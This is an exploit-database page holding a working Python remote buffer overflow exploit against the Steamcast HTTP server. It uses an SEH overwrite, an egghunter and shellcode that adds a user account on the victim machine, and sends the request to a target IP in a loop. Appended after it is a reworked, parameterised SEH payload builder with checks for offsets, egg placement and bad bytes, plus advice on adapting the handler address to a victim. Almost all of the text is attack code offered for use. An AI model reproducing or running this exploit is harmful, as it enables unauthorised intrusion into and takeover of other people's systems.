# Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
# Published : 2009-04-13
# Author : His0k4
#!/usr/bin/python
#[*] Usage : steamcast.py [victim_ip]
#[*] Bug : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thanks to overflow3r for informing me about the vuln.
#[*] Tested on : Windows XP SP2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslim HaCkErs (DZ), snakespc.com, secdz.com
#[*] Chi3arona houa : Serra7 merra7, koulchi mderra7 :D
#[*] Translated by Cyb3r-1st : esse7 embe7 embou :p
#Short Description : The previous exploit only runs small shellcode; this one is the opposite :)
#Note : The problem is that we need to find a DLL which is not compiled with GS. In my case I found idmmbc, a DLL loaded by Internet Download Manager, so try to find an unsafe DLL.
#Other note : The shellcode will be executed when the program is closed.
#Another one : When you have problems running the exploit, message me before you message str0ke.
import sys
import socket
import struct

if len(sys.argv) != 2:
    print("Usage: steamcast.py [victim_ip]")
    sys.exit(1)

host = sys.argv[1]
port = 8000

# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
# The first 8 bytes are the egg tag "Dz27" written twice; the egghunter below searches memory for it.
shellcode = (
    b"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\xcd\xd9\xee\xd9"
    b"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\xeb\xfc\xe2\xf4"
    b"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x7d\x17\x1d\x8d"
    b"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\xeb\x27\x32\x9f"
    b"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x3e\x42\xd6\x02"
    b"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x5a\x0a\xf3\xed"
    b"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x61\x9d\xb2\x36"
    b"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x6d\x1e\x19\x0f"
    b"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x65\x40\x7b\xfe"
    b"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x8f\x18\xa5\xf9"
    b"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x6b\x73\x86\x26"
    b"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x44\x52\xb6\x26"
    b"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x62\x64\x9d\x73"
    b"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x71\x79\x80\x75"
    b"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")

# Egghunter (32 bytes): scans memory for "Dz27Dz27" and jumps to the bytes right after it.
shellunt = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# Layout: NOP sled | egg + shellcode | nSEH | SEH handler | 20 NOPs | egghunter
exploit = (b"\x90" * (1003 - len(shellcode)) + shellcode
           + b"\xEB\x06\x90\x90"              # nSEH: jmp short +6 over the handler address
           + struct.pack("<I", 0x100227DB)    # SEH: pop/pop/ret in idmmbc.dll (\xDB\x27\x02\x10)
           + b"\x90" * 20
           + shellunt)

# It needs a loop to work
while 1:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    head = b"GET / HTTP/1.1\r\n"
    head += b"Host: " + host.encode() + b"\r\n"
    head += exploit + b"\r\n"
    head += b"\r\n\r\n"
    s.send(head)
    s.close()
# www.Syue.com [2009-04-13]
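The script above hard-codes every part of the SEH layout (sled, doubled egg tag, nSEH short jump, handler address, egghunter) as raw escapes, which makes it easy to get an offset or a tag wrong when porting it to another target. The following is an added example, not code from the page or from its author: it builds the same layout from named parameters, patches the tag into the egghunter the way the page's `shellunt` carries "Dz27", and checks the result the way a practitioner would before sending it (where the SEH record lands, that the egg can be found, that no bytes the HTTP parser could choke on appear). The 1003-byte offset and the 0x100227DB handler are the page's values; the 40-byte `int3` stand-in shellcode, the bad-byte set and all function names are assumptions of this example.

```python
import struct

# Skape's NtAccessCheckAndAuditAlarm egghunter, byte-for-byte the page's `shellunt`
# with the 4-byte tag blanked out. The tag is the imm32 of `mov eax, TAG` (opcode 0xB8)
# at offset 17, so the tag bytes live at offsets 18..21 and are patched in by egghunter().
EGGHUNTER_TEMPLATE = bytes.fromhex(
    "6681caff0f"      # or dx, 0x0fff   ; jump to the last byte of the current page
    "42"              # inc edx         ; next address to probe
    "52"              # push edx
    "6a02"            # push 0x02       ; syscall 2 on XP (NtAccessCheckAndAuditAlarm)
    "58"              # pop eax
    "cd2e"            # int 0x2e        ; does touching [edx] fault?
    "3c05"            # cmp al, 0x05    ; low byte of STATUS_ACCESS_VIOLATION
    "5a"              # pop edx
    "74ef"            # jz -> or dx     ; unmapped page: skip it
    "b8" "00000000"   # mov eax, TAG    ; patched below
    "8bfa"            # mov edi, edx
    "af"              # scasd           ; first copy of the tag?
    "75ea"            # jnz -> inc edx
    "af"              # scasd           ; second copy?
    "75e7"            # jnz -> inc edx
    "ffe7"            # jmp edi         ; land right after tag+tag
)
TAG_OFFSET = 18


def egghunter(tag):
    """Return the 32-byte hunter that looks for tag+tag in memory."""
    if len(tag) != 4:
        raise ValueError("egg tag must be exactly 4 bytes")
    return EGGHUNTER_TEMPLATE[:TAG_OFFSET] + tag + EGGHUNTER_TEMPLATE[TAG_OFFSET + 4:]


def build_seh_payload(shellcode, tag, handler, seh_offset=1003, nop_pad=20):
    """nops | tag tag shellcode | nSEH (jmp +6) | handler | nops | egghunter.

    seh_offset is the distance from the buffer start to the nSEH field
    (1003 on the page); handler is the pop/pop/ret address (0x100227DB there).
    """
    egg = tag * 2 + shellcode
    if len(egg) > seh_offset:
        raise ValueError("egg + shellcode does not fit before the SEH record")
    nseh = b"\xEB\x06\x90\x90"          # jmp short +6 over the handler pointer
    seh = struct.pack("<I", handler)    # little-endian, same as the page's \xDB\x27\x02\x10
    return (b"\x90" * (seh_offset - len(egg)) + egg
            + nseh + seh + b"\x90" * nop_pad + egghunter(tag))


def parse_seh_record(buf, seh_offset=1003):
    """Return (nSEH bytes, handler address) as they will land in the exception record."""
    nseh = buf[seh_offset:seh_offset + 4]
    handler = struct.unpack("<I", buf[seh_offset + 4:seh_offset + 8])[0]
    return nseh, handler


def find_egg(buf, tag):
    """Emulate the hunter's two scasd checks: offset of the first byte after tag+tag."""
    idx = buf.find(tag * 2)
    if idx < 0:
        raise LookupError("doubled tag not found")
    return idx + 2 * len(tag)


def bad_chars(buf, bad=b"\x00\r\n"):
    """Map each forbidden byte value to the offsets where it occurs (empty dict = clean)."""
    return {b: [i for i, c in enumerate(buf) if c == b] for b in bad if b in buf}


def build_request(host, payload):
    """Wrap the payload in the GET request the page sends, CRLF-terminated."""
    return (b"GET / HTTP/1.1\r\n" + b"Host: " + host.encode() + b"\r\n"
            + payload + b"\r\n\r\n\r\n")


# Constructed stand-in shellcode (40 x int3); a real payload goes here.
SAMPLE_SHELLCODE = b"\xCC" * 40

if __name__ == "__main__":
    buf = build_seh_payload(SAMPLE_SHELLCODE, b"Dz27", 0x100227DB)
    print("total length:", len(buf))
    print("SEH record:", parse_seh_record(buf))
    print("shellcode starts at:", find_egg(buf, b"Dz27"))
    print("bad bytes:", bad_chars(buf))
```

The bad-byte set is only a starting point: which bytes actually break the Steamcast parser has to be confirmed against the target, and the handler address must be re-read from the module on the victim, since 0x100227DB is the page's idmmbc.dll value for its test box.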